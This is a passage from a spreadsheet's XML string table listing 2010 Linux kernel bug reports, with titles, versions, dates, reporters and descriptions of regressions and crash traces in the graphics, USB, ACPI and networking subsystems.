    <t>2010-09-22 15:42 UTC</t>
  </si>
  <si>
    <t>2010-09-30 20:33 UTC</t>
  </si>
  <si>
    <t>kde screen failes after commit: commit e259befd9013e212648c3bd4f6f1fbf92d0dd51d Author: Chris Wilson &lt;chris@chris-wilson.co.uk&gt; Date: Fri Sep 17 00:32:02 2010 +0100 drm/i915: Fix Sandybridge fence registers After login in to kde, kde draws al its startup icons. After this the screen goes blank and there is a repeated patern of blocks. switching back to a console (Shift-F6) alters the patern somewhat but does not give me a usable display. - 00:02.0 VGA compatible controller: Intel Corporation Mobile 945GM/GMS, 943/940GML Express Integrated Graphics Controller (rev 03) (prog-if 00 [VGA controller]) - kde 4.4.3 - dell latitude d430 - slackware 13.1</t>
  </si>
  <si>
    <t>Radeon rv730 AGP/KMS/DRM kernel lockup</t>
  </si>
  <si>
    <t>2.6.36-rc5</t>
  </si>
  <si>
    <t>2010-09-23 16:48 UTC</t>
  </si>
  <si>
    <t>2010-12-15 22:19 UTC</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #17702 +++ This is a follow-on to bug #17702, which I filed, and bug #17201, which it was a dup of. I mentioned in #17201 that the fix only fixed part of my problem, getting me farther into starting X/K</t>
  </si>
  <si>
    <t>Dirtiable inode bdi default != sb bdi btrfs</t>
  </si>
  <si>
    <t>2010-09-26 06:26 UTC</t>
  </si>
  <si>
    <t>2010-10-08 19:14 UTC</t>
  </si>
  <si>
    <t>19082 19362</t>
  </si>
  <si>
    <t>Subject : Dirtiable inode bdi default != sb bdi btrfs Submitter : Cesar Eduardo Barros &lt;cesarb@cesarb.net&gt; Date : 2010-09-23 0:54 Message-ID : 4C9AA546.6050201@cesarb.net References : http://marc.info/?l=linux-kernel&amp;m=128520328929595&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.32.20 and 2.6.35.4 regression: Acer notebook does not power off but shutdown only</t>
  </si>
  <si>
    <t>2.6.35.x and I think &gt;= 2.6.32.21</t>
  </si>
  <si>
    <t>2010-09-26 10:41 UTC</t>
  </si>
  <si>
    <t>2010-10-25 13:00 UTC</t>
  </si>
  <si>
    <t>Created attachment 31532 [details] system log Ubuntu waits any key press from me to power off notebook completely. I think shutdown is ok because hard disks powers off( only motherboard cooler is working).Notebook is Acer Aspire 7520G. Earlier it worked ok with the same configuration. All generic Ubuntu kernels are ok, preempt kernels are wrong beginning from 2.6.32-23. I tried 2.6.35.4 and .5 kernels and they are both wrong for me. I have also Winxp x64 installed and it is ok. There are no any wrong message in system log. ACPI is working ok. The system hangs and waits the key press after halt -f -p -i -d command started.</t>
  </si>
  <si>
    <t>Screen flickers when switching from the console to X</t>
  </si>
  <si>
    <t>2010-09-27 12:05 UTC</t>
  </si>
  <si>
    <t>2010-12-16 23:52 UTC</t>
  </si>
  <si>
    <t>This is Ironlake i3-530 with latest Linux tree (32163f4b2cef28a5aab8b226ffecfc6379a53786). It was just the same on earlier .36 though. When I switch from X to the console there is no flicker, as with other kernels. But when I switch back, the X image shows for a moment, then instantly disappears and reappears after about 1 second. Then after several (10 or less) seconds the screen blackens and restores one more time. I can bisect this if needed.</t>
  </si>
  <si>
    <t>acpi sysfs creates useless module aliases</t>
  </si>
  <si>
    <t>acpi-bugzilla@lists.sourceforge.net</t>
  </si>
  <si>
    <t>2010-09-27 14:11 UTC</t>
  </si>
  <si>
    <t>Kay Sievers</t>
  </si>
  <si>
    <t>2010-11-02 02:53 UTC</t>
  </si>
  <si>
    <t>This shows the list of exported module aliases from ACPI: grep . /sys/bus/acpi/devices/*/modalias More than half of it are just 'acpi:device:' which looks rather useless to export, and these values without meaning should better be suppressed. These aliases cause ~70 needless calls to: /sbin/modprobe $MODALIAS on every bootup. We could filter that in userland, but prefer the fix at the ACPI sysfs to not to export information without information. :)</t>
  </si>
  <si>
    <t>Oops after removing unauthorized USB device</t>
  </si>
  <si>
    <t>2.6.35.6</t>
  </si>
  <si>
    <t>2010-09-27 22:45 UTC</t>
  </si>
  <si>
    <t>carsten_sommer</t>
  </si>
  <si>
    <t>2011-01-23 16:11 UTC</t>
  </si>
  <si>
    <t>If a plugged-in USB device (in this case an USB stick) is set to unauthorized (echo 0 &gt; /sys/bus/usb/devices/DEVICE/authorized) and is removed from the USB port afterwards, the kernel throws an Oops. The system often freezes after a short time, or after another USB device is connected. System is Ubuntu 10.04 with mainline kernel 2.6.35.6 The trace: [ 261.987545] usb 1-1.5.3: USB disconnect, address 7 [ 261.987578] BUG: unable to handle kernel NULL pointer dereference at 00000055 [ 261.987796] IP: [&lt;c0465dce&gt;] unlink1+0x1e/0xe0 [ 261.987939] *pdpt = 000000002ae9a001 *pde = 0000000000000000 [ 261.988130] Oops: 0000 [#1] SMP [ 261.988318] last sysfs file: /sys/devices/pci0000:00/0000:00:1a.0/class [ 261.988400] Modules linked in: parport_pc binfmt_misc ppdev usblp nfsd exportfs nfs lockd nfs_acl auth_rpcgss arc4 iwl3945 iwlagn iwlcore snd_hda_codec_nvhdmi mac80211 snd_hda_codec_conexant sn d_hda_intel snd_pcm_oss snd_hda_codec thinkpad_acpi snd_hwdep snd_mixer_oss snd_pcm snd_seq_dummy snd_seq_oss snd_seq_midi snd_rawmidi snd_seq_midi_event xt_tcpudp snd_seq nf_conntrack_ipv4 nf_defrag_ipv4 xt_state nf_conntrack s nd_timer uvcvideo cfg80211 sunrpc snd_seq_device uinput videodev sdhci_pci tpm_tis iptable_filter qcserial sdhci psmouse sbp2 v4l1_compat snd usb_wwan usbserial soundcore tpm snd_page_alloc ip_tables serio_raw led_class tpm_bios nvram intel_agp agpgart x_tables video output lp parport usb_storage raid10 raid456 async_raid6_recov async_pq raid6_pq async_xor xor async_memcpy async_tx ohci1394 raid1 ieee1394 ahci libahci raid0 e1000e multipath linear [ 261.993673] [ 261.993749] Pid: 42, comm: khubd Not tainted 2.6.35.6 #1 43494JG/43494JG [ 261.993837] EIP: 0060:[&lt;c0465dce&gt;] EFLAGS: 00010082 CPU: 3 [ 261.993919] EIP is at unlink1+0x1e/0xe0 [ 261.993995] EAX: 00000025 EBX: eaf10e2c ECX: ffffff94 EDX: eaf10e2c [ 261.994079] ESI: eaf10e2c EDI: f75fb000 EBP: f764fe94 ESP: f764fe80 [ 261.994162] DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 [ 261.994244] Process khubd (pid: 42, ti=f764e000 task=f7651960 task.ti=f764e000) [ 261.994341] Stack: [ 261.994414] 00000000 ffffff94 eaf10e2c eaf10bb0 eaf10ba0 f764feb0 c0465f81 00000001 [ 261.994897] &lt;0&gt; f75fb000 f35a1800 eaf10ba0 00000001 f764fec4 c04681de f35a1800 00000002 [ 261.995499] &lt;0&gt; f35a1898 f764fed8 c046824b f35a1800 c4841264 f35a1898 f764ff04 c046269e [ 261.996170] Call Trace: [ 261.996249] [&lt;c0465f81&gt;] ? usb_hcd_flush_endpoint+0xf1/0x110 [ 261.996336] [&lt;c04681de&gt;] ? usb_disable_endpoint+0x4e/0x80 [ 261.996422] [&lt;c046824b&gt;] ? usb_disable_device+0x3b/0x100 [ 261.996507] [&lt;c046269e&gt;] ? usb_disconnect+0xae/0x140 [ 261.996592] [&lt;c046349f&gt;] ? hub_thread+0x3cf/0x1050 [ 261.996680] [&lt;c014b7c9&gt;] ? dequeue_task_fair+0x79/0x80 [ 261.996769] [&lt;c016cdf0&gt;] ? autoremove_wake_function+0x0/0x50 [ 261.996855] [&lt;c04630d0&gt;] ? hub_thread+0x0/0x1050 [ 261.996936] [&lt;c016c9c4&gt;] ? kthread+0x74/0x80 [ 261.997019] [&lt;c016c950&gt;] ? kthread+0x0/0x80 [ 261.997099] [&lt;c0109886&gt;] ? kernel_thread_helper+0x6/0x10 [ 261.997181] Code: e8 f8 98 cd ff eb 9e 8d b6 00 00 00 00 55 89 e5 83 ec 14 89 5d f4 89 75 f8 89 7d fc 0f 1f 44 00 00 89 4d f0 89 c7 8b 42 28 89 d6 &lt;8b&gt; 58 30 85 db 74 23 8b 9f b4 00 00 00 89 f8 8b 4d f0 ff 53 34 [ 262.001055] EIP: [&lt;c0465dce&gt;] unlink1+0x1e/0xe0 SS:ESP 0068:f764fe80 [ 262.001251] CR2: 0000000000000055 [ 262.001331] ---[ end trace e9feb35d2da8ce3d ]--- Steps to reproduce: 1) connect USB stick 2) find USB device in sys-fs 2) echo 0 &gt; /sys/bus/usb/devices/DEVICE/authorized 3) remove USB stick If you need more information, please let me know.</t>
  </si>
  <si>
    <t>PROBLEM: kernel crash on USB-modem (Huawei E1750) hangup.</t>
  </si>
  <si>
    <t>2010-09-29 18:38 UTC</t>
  </si>
  <si>
    <t>2011-04-12 17:03 UTC</t>
  </si>
  <si>
    <t>Subject : PROBLEM: kernel crash on USB-modem (Huawei E1750) hangup. Submitter : O01eg &lt;O01eg@yandex.ru&gt; Date : 2010-09-26 19:50 Message-ID : op.vjnn1up1yohvy1@localhost References : http://marc.info/?l=linux-kernel&amp;m=128553111709569&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ACPI video backlight control doesn't work -- need backlight manager</t>
  </si>
  <si>
    <t>2010-09-30 05:29 UTC</t>
  </si>
  <si>
    <t>2011-07-30 06:47 UTC</t>
  </si>
  <si>
    <t>14216 15513 15528</t>
  </si>
  <si>
    <t>the ACPI video backlight control doesn't work on some machines. i.e. the backlight control method is evaluated properly but the backlight is not actually changed. For these machines, we need to control the backlight via other ways, like, platform driver, PCI legacy register, graphics native register, etc. So I'm planning to re-write the backlight sysfs class device to a backlight manager. More than one backlight driver can register to this backlight manager, and provide different callbacks to change the backlight. And we can switch to other drivers if ACPI video driver doesn't work. Even more, we can setup a blacklist for the laptops that known broken. In a word, this bug report is a gathering of all the bugs that ACPI backlight control is broken and we don't/can't fix in Linux/kernel.</t>
  </si>
  <si>
    <t>WARNING: at drivers/net/wireless/ath/ath5k/base.c:3475 ath5k_bss_info_changed+0x44/0x168 [ath5k]()</t>
  </si>
  <si>
    <t>2010-09-30 18:46 UTC</t>
  </si>
  <si>
    <t>2011-03-21 16:54 UTC</t>
  </si>
  <si>
    <t>Subject : WARNING: at drivers/net/wireless/ath/ath5k/base.c:3475 ath5k_bss_info_changed+0x44/0x168 [ath5k]() Submitter : Justin Mattock &lt;justinmattock@gmail.com&gt; Date : 2010-09-28 22:30 Message-ID : AANLkTim5WCGKPvEkOkO_YnMF9pg8mvLfQoFBNUFpfa_k@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=128571307018635&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Reproducible Kernel panic/oops during boot and startup - Panasonic Toughbooks</t>
  </si>
  <si>
    <t>2010-10-01 22:28 UTC</t>
  </si>
  <si>
    <t>Anthony Awtrey</t>
  </si>
  <si>
    <t>2010-10-31 20:04 UTC</t>
  </si>
  <si>
    <t>I've got reproducible kernel panics on recent stable kernels (2.6.32.8/16/23 and 2.6.35.2 specifically), but not on 2.6.30.x kernels. The panic/oops are occurring on two different hardware platforms; the Panasonic Toughbook CF-19 Mark 3 and and Toughbook CF-74 Mark 4. These are the latest revisions of these hardware models and we have seen the issue on multiple units. I'll attach the dmesg output from a few different panics / oops we've captured. There are two or three variations of kernel panics that repeat, so I'll include representatives from each type. All of the kernel panics I've seen occur during boot (initramfs or early init boot process). Once a system is up and running fully, I've not seen a single lockup or oops of this type again. I've looked at related bugs with the acpi subsystem, but haven't seen anything quite like our issue, so I am opening a new issue here. FYI, I build mainline kernels, using the Debian config and package process, with some very minor config tweaks. My base OS is the Squeeze pre-release. My local mirror has the following package versions for key related packages: * udev 160-1 * module-init-tools 3.12-1 * initramfs-tools 0.98.1 I have been *unable* to repeat this issue using either a Lenny baseline or a Squeeze baseline running the 2.6.30 kernel. I'll include the full panic messages to this ticket for each of the crashes, but here is a summary of the fun. The first type of issue reports bugs in the mm/slab.c or kernel/cred.c code. kernel BUG at mm/slab.c:2972! invalid opcode: 0000 [#1] SMP last sysfs file: /sys/devices/pci0000:00/0000:00:02.1/resource kernel BUG at mm/slab.c:2974! invalid opcode: 0000 [#1] SMP last sysfs file: /sys/class/net/lo/operstate kernel BUG at mm/slab.c:2974! invalid opcode: 0000 [#1] SMP last sysfs file: /sys/class/power_supply/BAT1/technology kernel BUG at mm/slab.c:2974! invalid opcode: 0000 [#1] SMP last sysfs file: /sys/class/power_supply/BAT1/technology kernel BUG at kernel/cred.c:101! invalid opcode: 0000 [#1] SMP last sysfs file: /sys/class/net/lo/operstate Another type of issue is a report of an unable to handle kernel paging request BUG: unable to handle kernel paging request at 52545346 IP: [&lt;c11696af&gt;] acpi_ut_update_object_reference+0x1d/0x11b *pdpt = 00000000375f1001 *pde = 0000000000000000 Oops: 0000 [#1] SMP last sysfs file: /sys/class/net/lo/operstate The the last type of issue we've seen are null pointer dereferences. BUG: unable to handle kernel NULL pointer dereference at (null) IP: [&lt;(null)&gt;] (null) *pdpt = 000000003673e001 *pde = 0000000000000000 Oops: 0010 [#1] SMP last sysfs file: /sys/devices/LNXSYSTM:00/LNXSYBUS:00/PNP0C0A:00/power_supply/BAT1/energy_full BUG: unable to handle kernel NULL pointer dereference at 0000000c IP: [&lt;c112dee8&gt;] acpi_ds_build_internal_object+0x10/0x12f *pdpt = 0000000036e03001 *pde = 0000000000000000 Oops: 0002 [#1] SMP last sysfs file: /sys/module/processor/initstate BUG: unable to handle kernel NULL pointer dereference at 0000000c IP: [&lt;c112dee8&gt;] acpi_ds_build_internal_object+0x10/0x12f *pdpt = 0000000036ddf001 *pde = 0000000000000000 Oops: 0002 [#1] SMP last sysfs file: /sys/devices/virtual/net/lo/operstate Now, it may seem like I'm cluttering up one bug report with too many different bits of information, but this issue I'm seeing does not appear on any of the other dozen or so different manufacturers / models I am testing this kernel on. I've only had issues on these two models and on multiple, different hardware units. The steps to reproduce are not exactly easy, but it involves a soft reboot after disk activity and/or fuse file system mounting. I can repeat this for testing any patches you may be willing to supply. Tony</t>
  </si>
  <si>
    <t>2.6.36-rc6</t>
  </si>
  <si>
    <t>2.6.36-rc6: modprobe Not tainted warning</t>
  </si>
  <si>
    <t>2010-10-03 18:32 UTC</t>
  </si>
  <si>
    <t>2010-12-19 14:44 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.36-rc6: modprobe Not tainted warning Submitter : Heinz Diehl &lt;htd@fritha.org&gt; Date : 2010-09-30 18:25 Message-ID : 20100930182516.GA15089@fritha.org References : http://marc.info/?l=linux-kernel&amp;m=128587114004680&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.36-rc6 BUG at drivers/scsi/scsi_lib.c:1113</t>
  </si>
  <si>
    <t>2010-10-03 18:37 UTC</t>
  </si>
  <si>
    <t>2010-10-10 17:27 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.36-rc6 BUG at drivers/scsi/scsi_lib.c:1113 Submitter : "George Spelvin" &lt;linux@horizon.com&gt; Date : 2010-09-30 21:10 Message-ID : 20100930211006.27449.qmail@science.horizon.com References : http://marc.info/?l=linux-kernel&amp;m=128588102620299&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ondemand is slow</t>
  </si>
  <si>
    <t>2010-10-03 21:08 UTC</t>
  </si>
  <si>
    <t>Dan Hollocher</t>
  </si>
  <si>
    <t>2011-01-24 13:01 UTC</t>
  </si>
  <si>
    <t>I find ondemand is allot slower than conservative for cpu bound tasks. My understanding is that performance wise, ondemand should be on par or slightly faster than conservative. My chip is an intel core 2 duo, I think 4300. I am using 2.6.35 from Ubuntu. On the kraken benchmark, ondemand completes in 34216.6ms +/- 2.3% where as conservative completes in 25699.3ms +/- 5.6% Again, it is my understanding that ondemand should not have this much of a slowdown.</t>
  </si>
  <si>
    <t>linux-2.6.36-rc5 crash with gianfar ethernet at full line rate traffic</t>
  </si>
  <si>
    <t>2010-10-04 06:25 UTC</t>
  </si>
  <si>
    <t>emin ak</t>
  </si>
  <si>
    <t>2011-01-23 16:15 UTC</t>
  </si>
  <si>
    <t>My problem is kernel crash under full line rate random packet length ip network traffic. I'am using default unmodified kernel and default SMP kernel configuration, MPC8572DS development board and also using a hardware packet generator. My test is ip forwarding between eth0 and eth1, and Hardware packet generator produces full duplex, full line rate traffic with random packet length and random payload . After a few millions of packets passed, kernel produces this bellow two different crash messages . I have retry this scenario many times, crash occurs sometimes on skb_put, but mostly occurs on ip_rcv function. I have aplied same test to latest stable linux 2.6.35.6 kernel. Same errors produced. Here is crash logs: Thanks. Emin First type of crash: root@mpc8572ds:~# skb_over_panic: text:c0226280 len:1171 put:1171 head:eed6d000 data:eed63040 tail:0xeed6d4d3 end:0xeed63660 dev:&lt;NULL&gt; ------------[ cut here ]------------ kernel BUG at net/core/skbuff.c:127! Oops: Exception in kernel mode, sig: 5 [#1] SMP NR_CPUS=2 MPC8572 DS last sysfs file: /sys/devices/pci0002:03/0002:03:00.0/subsystem_device Modules linked in: NIP: c023bdcc LR: c023bdcc CTR: c01f3ff8 REGS: effe7d70 TRAP: 0700 Not tainted (2.6.36-rc5) MSR: 00029000 &lt;EE,ME,CE&gt; CR: 22028024 XER: 20000000 TASK = ef83e9a0[9] 'ksoftirqd/1' THREAD: ef856000 CPU: 1 GPR00: c023bdcc effe7e20 ef83e9a0 0000007c 00021000 ffffffff c01f7b98 c03ccf1c GPR08: c03c69d4 c03f94b4 00c4e000 00000004 20028048 1001a108 ef211000 efb52d90 GPR16: efb52e38 efb52870 00000000 ef211800 00000008 00000009 efb52800 00000037 GPR24: ef24e180 ef2be040 00000000 ef211948 efb52b80 00000493 ef015940 ef386600 NIP [c023bdcc] skb_put+0x8c/0x94 LR [c023bdcc] skb_put+0x8c/0x94 Call Trace: [effe7e20] [c023bdcc] skb_put+0x8c/0x94 (unreliable) [effe7e30] [c0226280] gfar_clean_rx_ring+0x104/0x4b8 [effe7e90] [c02269dc] gfar_poll+0x3a8/0x60c [effe7f60] [c024928c] net_rx_action+0xf8/0x1a4 [effe7fa0] [c0042524] __do_softirq+0xe0/0x178 [effe7ff0] [c000e59c] call_do_softirq+0x14/0x24 [ef857f50] [c0004840] do_softirq+0x90/0xa0 [ef857f70] [c00430e4] run_ksoftirqd+0xb4/0x164 [ef857fb0] [c00586b4] kthread+0x7c/0x80 [ef857ff0] [c000e9a8] kernel_thread+0x4c/0x68 Instruction dump: 81030098 2f800000 409e000c 3d20c037 3809a19c 3c60c037 7c8802a6 7d695b78 3863b010 90010008 4cc63182 4be016c5 &lt;0fe00000&gt; 48000000 9421fff0 7c0802a6 Kernel panic - not syncing: Fatal exception in interrupt --------------- second type of crash: Faulting instruction address: 0xc026c1dc Oops: Kernel access of bad area, sig: 11 [#1] SMP NR_CPUS=2 MPC8572 DS last sysfs file: /sys/devices/pci0002:03/0002:03:00.0/subsystem_device Modules linked in: NIP: c026c1dc LR: c026bfac CTR: 00000000 REGS: effebd00 TRAP: 0300 Not tainted (2.6.36-rc5) MSR: 00029000 &lt;EE,ME,CE&gt; CR: 42028042 XER: 00000000 DEAR: 0000cad8, ESR: 00000000 TASK = ef83cde0[3] 'ksoftirqd/0' THREAD: ef84a000 CPU: 0 GPR00: 00000005 effebdb0 ef83cde0 00000000 000001b9 00000000 c1008060 00000000 GPR08: 02c3f605 0000ca00 000005b9 0000ca00 b653a6c7 7af823f0 ef217000 efbab590 GPR16: efbab638 efbab070 00000000 ef217800 00000008 00000018 efbab000 00000028 GPR24: c03f971c c0410000 c0400000 c03f94b4 effea000 ef316e40 00000000 eecb685e NIP [c026c1dc] ip_rcv+0x3f8/0x808 LR [c026bfac] ip_rcv+0x1c8/0x808 Call Trace: [effebdb0] [c026c204] ip_rcv+0x420/0x808 (unreliable) [effebde0] [c02482dc] __netif_receive_skb+0x2f8/0x324 [effebe10] [c02483a4] netif_receive_skb+0x9c/0xb0 [effebe30] [c0226308] gfar_clean_rx_ring+0x18c/0x4b8 [effebe90] [c02269dc] gfar_poll+0x3a8/0x60c [effebf60] [c024928c] net_rx_action+0xf8/0x1a4 [effebfa0] [c0042524] __do_softirq+0xe0/0x178 [effebff0] [c000e59c] call_do_softirq+0x14/0x24 [ef84bf50] [c0004840] do_softirq+0x90/0xa0 [ef84bf70] [c00430e4] run_ksoftirqd+0xb4/0x164 [ef84bfb0] [c00586b4] kthread+0x7c/0x80 [ef84bff0] [c000e9a8] kernel_thread+0x4c/0x68 Instruction dump: 8148003c 318a0001 7d690194 91680038 9188003c 4bfffd78 7fa3eb78 48002a29 2f830000 40beff50 817d0048 5569003c &lt;a00900d8&gt; 2f800005 419e0034 2f800003 Kernel panic - not syncing: Fatal exception in interrupt</t>
  </si>
  <si>
    <t>Intel_idle does not Detect C6 - MSI Wind U110</t>
  </si>
  <si>
    <t>2010-10-05 05:31 UTC</t>
  </si>
  <si>
    <t>2010-10-31 19:24 UTC</t>
  </si>
  <si>
    <t>I will attach acpidump and dmesg.</t>
  </si>
  <si>
    <t>2.6.35.6 fails to suspend (pxa2xx-mci.0)</t>
  </si>
  <si>
    <t>2010-10-06 18:58 UTC</t>
  </si>
  <si>
    <t>2010-10-17 19:46 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.35.6 fails to suspend (pxa2xx-mci.0) Submitter : Sven Neumann &lt;s.neumann@raumfeld.com&gt; Date : 2010-10-04 7:30 Message-ID : 1286177435.2140.5.camel@sven References : http://marc.info/?l=linux-kernel&amp;m=128617869729382&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[drm:init_ring_common] *ERROR* render ring head not reset to zero</t>
  </si>
  <si>
    <t>2.6.36-rc</t>
  </si>
  <si>
    <t>2010-10-06 19:10 UTC</t>
  </si>
  <si>
    <t>2010-12-19 12:19 UTC</t>
  </si>
  <si>
    <t>Subject : [drm:init_ring_common] *ERROR* render ring head not reset to zero Submitter : Thomas Meyer &lt;thomas@m3y3r.de&gt; Date : 2010-10-04 20:31 Message-ID : 201010042231.20320.thomas@m3y3r.de References : http://marc.info/?l=linux-kernel&amp;m=128622441331199&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>extract-ikconfig only works with gzip'ed kernel images</t>
  </si>
  <si>
    <t>2010-10-07 17:06 UTC</t>
  </si>
  <si>
    <t>Justin</t>
  </si>
  <si>
    <t>2010-10-31 18:08 UTC</t>
  </si>
  <si>
    <t>When anything else then CONFIG_KERNEL_GZIP is selected e.g. CONFIG_KERNEL_BZIP2, the script extract-ikconfig fails with "extract-ikconfig: Cannot find kernel config." This should be either checked in the script or support for pther compression methods may be nice.</t>
  </si>
  <si>
    <t>[REGRESSION] no sound on T60 laptop (HDA Intel)</t>
  </si>
  <si>
    <t>2010-10-07 18:49 UTC</t>
  </si>
  <si>
    <t>2010-11-02 21:27 UTC</t>
  </si>
  <si>
    <t>Subject : [REGRESSION] no sound on T60 laptop (HDA Intel) Submitter : Miklos Szeredi &lt;miklos@szeredi.hu&gt; Date : 2010-10-05 9:25 Message-ID : E1P33mT-0003qa-Fv@pomaz-ex.szeredi.hu References : http://marc.info/?l=linux-kernel&amp;m=128627079921512&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>phison unable to read partition table</t>
  </si>
  <si>
    <t>2.6.36-rc7</t>
  </si>
  <si>
    <t>2010-10-07 21:11 UTC</t>
  </si>
  <si>
    <t>Heinz Wiesinger</t>
  </si>
  <si>
    <t>2011-01-23 15:38 UTC</t>
  </si>
  <si>
    <t>Created attachment 32712 [details] dmesg log I have a Verbatim ExpressCard SSD that uses the phison driver from staging. On recent kernels when loading the module I see a lot of errors and the driver is eventually unable to read the partition table off the device, rendering the device useless on those kernels. (log attached) I tested it with 2.6.35 and 2.6.36rc7, same behaviour. 2.6.32 works find. I haven't had the chance yet to test .33 and .34.</t>
  </si>
  <si>
    <t>AoE error messages not rate-limited</t>
  </si>
  <si>
    <t>2010-10-09 06:35 UTC</t>
  </si>
  <si>
    <t>2010-10-31 18:03 UTC</t>
  </si>
  <si>
    <t>Hello. I had an AoE device go down overnight, and while a server was trying to write to it, it was also writing this message to its logs: 209 printk(KERN_INFO "aoe: device %ld.%d is not up\n", 210 d-&gt;aoemajor, d-&gt;aoeminor); (See http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=blob;f=drivers/block/aoe/aoeblk.c;hb=HEAD#l208 ) The message appeared many times per second, and over several hours produced about 7.5 gigabytes of log files, filling up all free space on the root filesystem. I think the errors from the AoE module should be limited in rate, or the repeating (exactly the same) error messages should be folded into one with repeat count, like already done with some kernel messages from other modules.</t>
  </si>
  <si>
    <t>System freeze on shutdown - bisected to commit 29d08b3efddc</t>
  </si>
  <si>
    <t>2010-10-09 19:08 UTC</t>
  </si>
  <si>
    <t>2010-10-09 20:12 UTC</t>
  </si>
  <si>
    <t>Subject : System freeze on shutdown - bisected to commit 29d08b3efddc Submitter : Marc Dionne &lt;marc.c.dionne@gmail.com&gt; Date : 2010-10-05 22:24 Message-ID : AANLkTikBXb-QZ2twFUZHzzYSHyZz1Kca4GRLu_6bo+Oo@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=128631751031207&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline. Caused by: commit 29d08b3efddca628b0360411ab2b85f7b1723f48 Author: Dave Airlie &lt;airlied@redhat.com&gt; Date: Mon, 27 Sep 2010 06:17:17 +0000 drm/gem: handlecount isn't really a kref so don't make it one. Reviewed-by: Chris Wilson &lt;chris@chris-wilson.co.uk&gt; Signed-off-by: Dave Airlie &lt;airlied@redhat.com&gt; First-Bad-Commit : 29d08b3efddca628b0360411ab2b85f7b1723f48</t>
  </si>
  <si>
    <t>do_IRQ: 0.89 No irq handler for vector (irq -1)</t>
  </si>
  <si>
    <t>2010-10-10 17:45 UTC</t>
  </si>
  <si>
    <t>2010-11-16 19:48 UTC</t>
  </si>
  <si>
    <t>Subject : "do_IRQ: 0.89 No irq handler for vector (irq -1)" Submitter : Dave Airlie &lt;airlied@gmail.com&gt; Date : 2010-10-07 8:55 Message-ID : AANLkTikZj21CtFwC2ttvc0wJPx2qyedn7b1xXaxH659E@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=128644173420501&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[LogFS][2.6.36.rc7+] Kernel BUG at readwrite.c:1193</t>
  </si>
  <si>
    <t>2010-10-12 17:00 UTC</t>
  </si>
  <si>
    <t>2010-12-24 13:43 UTC</t>
  </si>
  <si>
    <t>Subject : [LogFS][2.6.36.rc7+] Kernel BUG at readwrite.c:1193 Submitter : Prasad Joshi &lt;prasadjoshi124@gmail.com&gt; Date : 2010-10-10 17:44 Message-ID : AANLkTi=JkcuWBPo+X-i+9o-BJFVqjea1J3e=Mr=HvAWF@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=128673196203340&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.36-rc7 boot stalls unless nolapic_timer - Lenovo S12</t>
  </si>
  <si>
    <t>intel_idle</t>
  </si>
  <si>
    <t>2010-10-12 17:11 UTC</t>
  </si>
  <si>
    <t>2012-01-29 17:11 UTC</t>
  </si>
  <si>
    <t>power-management_intel_idle@kernel-bugs.osdl.org</t>
  </si>
  <si>
    <t>Subject : Lenovo S12 2.6.36-rc7 lockup Submitter : Chris Vine &lt;chris@cvine.freeserve.co.uk&gt; Date : 2010-10-10 12:59 Message-ID : 20101010135912.76eb61b7@boulder.homenet References : http://marc.info/?l=linux-kernel&amp;m=128671620721712&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.36-rc7: NULL pointer dereference in ehci_clear_tt_buffer_complete</t>
  </si>
  <si>
    <t>2010-10-12 17:18 UTC</t>
  </si>
  <si>
    <t>2010-12-05 19:53 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.36-rc7: NULL pointer dereference in ehci_clear_tt_buffer_complete Submitter : Stefan Richter &lt;stefanr@s5r6.in-berlin.de&gt; Date : 2010-10-11 20:56 Message-ID : tkrat.9f585ea47331a2a2@s5r6.in-berlin.de References : http://marc.info/?l=linux-kernel&amp;m=128683064431749&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kworker consumes ~100% CPU on HP Elitebook 8540w running 2.6.36_rc6-git4</t>
  </si>
  <si>
    <t>2.6.36_rc6-git4</t>
  </si>
  <si>
    <t>2010-10-13 06:13 UTC</t>
  </si>
  <si>
    <t>Ozan Caglayan</t>
  </si>
  <si>
    <t>2011-03-28 22:59 UTC</t>
  </si>
  <si>
    <t>2.6.31 - &gt; 2.6.32 regression: intermittent Thermal zone sensor reports 0°C --- Quanta tw8, tw9 --- probably caused by commit 2a84cb9852f52c0cd1c48bca41a8792d44ad06cc</t>
  </si>
  <si>
    <t>2.6.32 upwards</t>
  </si>
  <si>
    <t>2010-10-13 12:36 UTC</t>
  </si>
  <si>
    <t>Jan-Matthias Braun</t>
  </si>
  <si>
    <t>2015-05-26 14:52 UTC</t>
  </si>
